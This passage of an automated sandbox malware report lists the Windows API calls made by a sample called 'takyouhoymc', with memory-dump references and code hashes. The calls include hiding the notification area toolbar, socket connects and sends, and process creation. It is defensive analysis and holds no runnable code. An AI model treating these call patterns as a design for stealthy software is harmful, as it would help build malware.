                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowPos.USER32(?,000000FF,?,00000000,00000000,00000000,00000040), ref: 0041441C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414425
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414432
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 0041443B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 0041443E
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414441
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414444
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414447
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: Sleep.KERNEL32(00000064), ref: 0041444B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414454
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindowRect.USER32(?,?), ref: 0041725B
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetClientRect.USER32(?,?), ref: 00417266
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindowInfo.USER32(?,?), ref: 00417271
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindow.USER32(?,00000005), ref: 0041729C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$FocusMessagePostRectSleep$CursorForegroundShow$ClientDesktopInfoText
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2348713440-0
                                                                                                                                                                                                                                                      • Opcode ID: 4f66df79ac08361e819a94fecc4ebc5accedf33fdd5bc51566be295143cdaa7a
                                                                                                                                                                                                                                                      • Instruction ID: 8d1f864990b006e87c7e47a02d893c60dad91602a936ac63b34a93652cf90b4e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f66df79ac08361e819a94fecc4ebc5accedf33fdd5bc51566be295143cdaa7a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D11AF32900208FBDF11AFE0DC06ADE3F3AEF48310F104096FD146A191D67656A2DBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$gethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 826719543-0
                                                                                                                                                                                                                                                      • Opcode ID: 7231b53defef9bb744e4c9a9a3d516ed9fc0ef3e16fe81c510fceb1934fb8bdb
                                                                                                                                                                                                                                                      • Instruction ID: 49cc356f681f43e0345f39264a21fc1f5e604774ab5c518727903f99d3873967
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7231b53defef9bb744e4c9a9a3d516ed9fc0ef3e16fe81c510fceb1934fb8bdb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E212731A04744AFDB309BA4ED489EB7BA9AB09301B44057AE701F7121DB38A995C75E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00428591,0042C208,?,?,00423ED5,00000000,00000001,00000000,00428591,00000003), ref: 00423E09
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,?,00423ED5,00000000,00000001,00000000,00428591,00000003), ref: 00423E10
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                      • String ID: ,B$4B$8B$<B
                                                                                                                                                                                                                                                      • API String ID: 2429186680-1229481957
                                                                                                                                                                                                                                                      • Opcode ID: ffeb17e794c4f1baaeecf30d142b33d19d20cd8600d0f5d99c1bf63b766f24d0
                                                                                                                                                                                                                                                      • Instruction ID: d3c99af46821c89edaae412be2f8ea36b7e162a635c5aed3ba29d9a877b0b6c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffeb17e794c4f1baaeecf30d142b33d19d20cd8600d0f5d99c1bf63b766f24d0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11B4317011319BDB208F5DFC4425A37B59B41B92B910437E816C7211E7BCDE89CB9E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0,76AF35B0,00000000), ref: 00408F8D
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408FC1
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: inet_addr.WS2_32(?), ref: 004138C0
                                                                                                                                                                                                                                                        • Part of subcall function 004138BC: gethostbyname.WS2_32(?), ref: 004138CF
                                                                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 00408FE2
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00408FEE
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00408F07,00000000,00000000,00000000), ref: 0040900E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountCreateSleepThreadTickgethostbynamehtonsinet_addrwsprintf
                                                                                                                                                                                                                                                      • String ID: {C@
                                                                                                                                                                                                                                                      • API String ID: 3851064533-174916597
                                                                                                                                                                                                                                                      • Opcode ID: ebadc27a76bb4e3271548248bddeae61745505eb3c8ff269f57bfeee11fe8abd
                                                                                                                                                                                                                                                      • Instruction ID: c89f4757909d1c3c941f245e0f95c8f06e31dabbe2118c59e00684056dfebd2f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebadc27a76bb4e3271548248bddeae61745505eb3c8ff269f57bfeee11fe8abd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29016175508348BFDB017F60BC4AE6A3B68EB00346F40407AFD05962A3D7759E58CB6E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000020), ref: 004146B0
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,0000003C), ref: 004146D1
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 004146F7
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004146FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$lstrlen$ClassEnableNameShowText
                                                                                                                                                                                                                                                      • String ID: Notification Ar$ToolbarWindow32
                                                                                                                                                                                                                                                      • API String ID: 538972384-2301149577
                                                                                                                                                                                                                                                      • Opcode ID: cff6bb962b0c74caeb6239d4ee8141f09c688826f5017db304f9c0507c69a6af
                                                                                                                                                                                                                                                      • Instruction ID: 3eb788062b1b642da715b47cf961bf6c044cf71f8bd890d90de7f59fbb932858
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cff6bb962b0c74caeb6239d4ee8141f09c688826f5017db304f9c0507c69a6af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3F0A4B2645214EBEB10A7E0AC0AEEE736CEF06305F540027F911E21C0E7689982877F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00408F09
                                                                                                                                                                                                                                                      • SetThreadPriority.KERNEL32(00000000), ref: 00408F10
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00408F26
                                                                                                                                                                                                                                                        • Part of subcall function 00408DF6: socket.WS2_32(00000002,00000001,00000006), ref: 00408E0A
                                                                                                                                                                                                                                                        • Part of subcall function 00408DF6: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00408E3B
                                                                                                                                                                                                                                                        • Part of subcall function 00408DF6: connect.WS2_32(00000000,00457890,00000010), ref: 00408E64
                                                                                                                                                                                                                                                        • Part of subcall function 00408DF6: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00408EEF
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(004578A0,00000000), ref: 00408F44
                                                                                                                                                                                                                                                      • send.WS2_32(00000000,004578A0,00000000), ref: 00408F4D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 00408F58
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00408F5F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Threadioctlsocket$CountCurrentPrioritySleepTickclosesocketconnectlstrlensendsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3664699870-0
                                                                                                                                                                                                                                                      • Opcode ID: 0be64e6567d89f056c3a78872591e7995a824adc3a80b9f9394802f9a2fc880a
                                                                                                                                                                                                                                                      • Instruction ID: af24a37bd55c00e8db6d02cde9bfb8839c93208e7e9c10785fd6ece9764becba
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0be64e6567d89f056c3a78872591e7995a824adc3a80b9f9394802f9a2fc880a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F03072505200AFD3116BB4BD4CB6F3B69AB56322F400179F601E15E2CF389895C77E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406BB7
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                        • Part of subcall function 0041A7A8: lstrlenA.KERNEL32(0045A2D8,?,0000C328,?,0040178B,00000000,00000028,?,?,00000000,00000101,0000C328,?,00000028), ref: 0041A7C3
                                                                                                                                                                                                                                                        • Part of subcall function 0041A7A8: lstrlenA.KERNEL32(0045A2D8,00000000,0040178B,00000000,00000028,?,?,00000000,00000101,0000C328,?,00000028), ref: 0041A7DB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A570), ref: 00406CBF
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,-0042E048), ref: 00406CD4
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A570), ref: 00406D3C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,-0042E048), ref: 00406D51
                                                                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 00406D85
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$CountTicklstrlen$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3976948946-0
                                                                                                                                                                                                                                                      • Opcode ID: 70f2160166c336fa2f00a869266c7e2d3911993d0b322237ec74a2ef109c4f89
                                                                                                                                                                                                                                                      • Instruction ID: 16366cfa811712eeb39b173566f72963fae4b38cea82189eb1d20190be30719b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70f2160166c336fa2f00a869266c7e2d3911993d0b322237ec74a2ef109c4f89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1615CB6E00218BBDB14DBE5DC45ADEBBBEAB84304F10406BF105E7241EB789B94CB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(?,76AF0F00,00000000,00000000,00000001,?,0042B7CC,00000000,?,?,0042B7CC,?,00000000,0044EE14), ref: 00426E75
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,0044EE14), ref: 00426E7D
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,0044EE14), ref: 00426EBA
                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,0042B7CC), ref: 00426EC7
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,0044EE14), ref: 00426ED3
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,0044EE14), ref: 00426EE3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitLastObjectSingleWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 157478886-0
                                                                                                                                                                                                                                                      • Opcode ID: 0e6dae67add2e7edbc2a33852ad0284827fa2541cb9d48df200fd36df296eb53
                                                                                                                                                                                                                                                      • Instruction ID: a1458e87b792cc974f808cfb15b60c101ce6bb7be5ffe00b4e73d95fa57211e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e6dae67add2e7edbc2a33852ad0284827fa2541cb9d48df200fd36df296eb53
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21513635B00268AFCF21CF64E8804EEBBB5FB05314FA2416BE411AB261D7359E05CB55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,0042B908,00000001,?,0042C268,0000001C,00424AE9,00000001,00000020,00000100,?,00000000), ref: 00425C14
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00425C26
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00424DA1,00000000,00000000,0042C268,0000001C,00424AE9,00000001,00000020,00000100,?,00000000), ref: 00425C88
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00424DA1,?,00000000), ref: 00425D06
                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00425D18
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3581945363-0
                                                                                                                                                                                                                                                      • Opcode ID: 76cad6ba775d8bcd516b82ce6fc3f11115317b1e53353c35467e1d5be93a392a
                                                                                                                                                                                                                                                      • Instruction ID: b6579f8ccea5aad9265b89f1fb7ec4f214dc27c6ff7fda89f092b79741bf8ca7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76cad6ba775d8bcd516b82ce6fc3f11115317b1e53353c35467e1d5be93a392a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E412631B00639EBCB218F61FC49AAF7B75EF44B60F94411AF810A6250D7388D51CBAD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
